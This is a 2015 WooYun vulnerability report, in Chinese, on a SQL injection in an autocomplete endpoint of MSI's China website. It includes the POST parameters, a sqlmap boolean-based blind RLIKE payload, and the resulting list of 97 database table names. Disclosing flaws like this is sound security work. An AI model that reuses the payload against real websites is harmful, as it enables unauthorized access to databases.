当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153086

漏洞标题:微星中国官网某处SQL注入漏洞

相关厂商:微星

漏洞作者: 染血の雪

提交时间:2015-11-11 09:32

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-11: 细节已通知厂商并且等待厂商处理中
2015-11-23: 厂商已经确认,细节仅向厂商公开
2015-12-03: 细节向核心白帽子及相关领域专家公开
2015-12-13: 细节向普通白帽子公开
2015-12-23: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

双11基友要买笔记本,问我什么牌子好。

详细说明:

url:

http://**.**.**.**/wheretobuy/autocomplete


post:

country_id=135791&city_id=135791&category_id=135791


payload:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: country_id=135791&city_id=135791&category_id=135791' RLIKE (SELECT (CASE WHEN (1079=1079) THEN 135791 ELSE 0x28 END)) AND 'beRI'='beRI
---
[INFO] the back-end DBMS is MySQL
web server operating system: Windows NT 4.0
web application technology: PHP 5.4.16
back-end DBMS: MySQL 5


漏洞证明:

`_T5@$XP{@@GZ2{]W1CC1`D.png


07_(JC[Z24$PU6XFET@}7IW.png


Database: cms_online
[97 tables]
+--------------------------+
| cms_banner               |
| cms_bannerarea           |
| cms_bannertype           |
| cms_category             |
| cms_chat                 |
| cms_country              |
| cms_data                 |
| cms_download             |
| cms_download_tmp         |
| cms_downloadlanguage     |
| cms_downloados           |
| cms_downloadtype         |
| cms_faq                  |
| cms_faq_file             |
| cms_faq_file_ims         |
| cms_faq_file_local       |
| cms_faq_ims              |
| cms_faq_local            |
| cms_faq_log              |
| cms_faq_product          |
| cms_faq_product_ims      |
| cms_faq_product_local    |
| cms_faqtype              |
| cms_faqtype_ims          |
| cms_faqtype_local        |
| cms_feature              |
| cms_featuregroup         |
| cms_function             |
| cms_gacode               |
| cms_group                |
| cms_icon                 |
| cms_inquiry              |
| cms_issue                |
| cms_issuelabel           |
| cms_localization         |
| cms_log                  |
| cms_mail_user            |
| cms_mb_old_cpu           |
| cms_mb_old_cpu_bios      |
| cms_mb_old_cpu_bom       |
| cms_mb_old_cpu_product   |
| cms_mb_support_bios      |
| cms_mb_support_bom       |
| cms_mb_support_category  |
| cms_mb_support_cpu       |
| cms_mb_support_hdd       |
| cms_mb_support_mb        |
| cms_mb_support_memory    |
| cms_mb_support_oc_memory |
| cms_mb_support_report    |
| cms_mb_support_vga       |
| cms_menu                 |
| cms_menu_area            |
| cms_menu_item            |
| cms_message              |
| cms_news                 |
| cms_newstype             |
| cms_old_tag              |
| cms_operation_log        |
| cms_product              |
| cms_product_category     |
| cms_product_download     |
| cms_product_feature      |
| cms_product_icon         |
| cms_product_news         |
| cms_product_slogan       |
| cms_product_tag          |
| cms_productbanner        |
| cms_productdescription   |
| cms_productpicture       |
| cms_productsort          |
| cms_productvideo         |
| cms_publish              |
| cms_queue                |
| cms_section              |
| cms_seo                  |
| cms_seo_location         |
| cms_sku                  |
| cms_skucolumn            |
| cms_skudata              |
| cms_skupicture           |
| cms_slogan               |
| cms_specification        |
| cms_specificationcolumn  |
| cms_staticpage           |
| cms_support              |
| cms_support_item         |
| cms_synchronize          |
| cms_tag                  |
| cms_template             |
| cms_testreport           |
| cms_testreport_product   |
| cms_type                 |
| cms_user                 |
| cms_user_message         |
| cms_wattage              |
| cms_wheretobuy           |
+--------------------------+


修复方案:

只要不忽略方法总是有的。

版权声明:转载请注明来源 染血の雪@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-11-23 11:35

厂商回复:

CNVD未复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无